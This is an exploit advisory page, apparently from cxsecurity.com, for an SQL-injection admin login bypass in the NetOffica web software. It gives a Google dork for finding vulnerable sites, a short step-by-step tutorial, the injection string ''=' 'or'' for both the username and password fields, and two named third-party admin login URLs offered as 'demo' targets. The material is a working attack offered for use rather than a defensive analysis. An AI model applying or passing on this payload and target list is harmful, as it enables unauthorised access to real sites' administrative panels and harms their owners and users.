NetOffica Admin Login Bypass

Published
Credit
Risk
2017.04.24
The Devil
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: intext:"Powered by NetOffica "

======================================================
# Exploit Title: NetOffica Admin Login Bypass
# Google Dork: intext:"Powered by NetOffica "
# Date: 2017-04-24
# Author: The Devil (Mohamad Peywasteh)
# Telegram: t.me/afsordeh
# Tested on: win10 64bit
======================================================
Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or'
[+] Password: '=' 'or'
======================================================
[+] Demo Site
[+] http://dicvn.com/admin/login
[+] http://khonet.com/admin/login/
======================================================
Thanks To Emad Mahmoodi


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com